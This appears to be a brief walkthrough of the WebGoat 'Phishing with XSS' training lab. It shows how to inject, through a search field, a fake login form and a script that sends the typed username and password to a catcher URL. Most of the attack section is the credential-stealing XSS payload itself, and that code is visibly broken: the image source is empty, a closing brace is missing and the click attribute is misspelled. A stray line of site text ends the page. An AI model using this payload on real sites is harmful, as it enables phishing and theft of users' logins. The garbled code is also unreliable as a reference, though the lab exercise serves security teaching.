XSS - Phishing with XSS


Using the XSS vulnerabilities perform phishing attack


In the search function, we will insert scripts to create form perform phishing attack, Here we will redirect the user input to "http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName "

Step by step Guide

1. Create XSS script with html user/pass form. Color in red is script that will read the input from the form and send it to the catcher of WebGoat. The attack script consist two parts, a form with user/pass input field, also script that read the input from the form and send it to catcher defined, in our case the WebGoat. 



function hack(){

XSSImage=new Image;

XSSImage.src="" + document.phish.user.value + "&password=" + document.phish.pass.value + "";

alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);



<form name="phish">


<H2>This feature requires account login:</H2>

Enter Username:<input type="text" name="user" ><br>

Enter Password: <input type="password" name = "pass"><br>

<input type="submit" name="login" value="login" on-click="hack()"> 

2. Input the above script to the search field. 

3. Now Phishing Account login appears below the search field.  

4. If user enter username/password, confirmation window will pop up. 

Please publish modules in offcanvas position.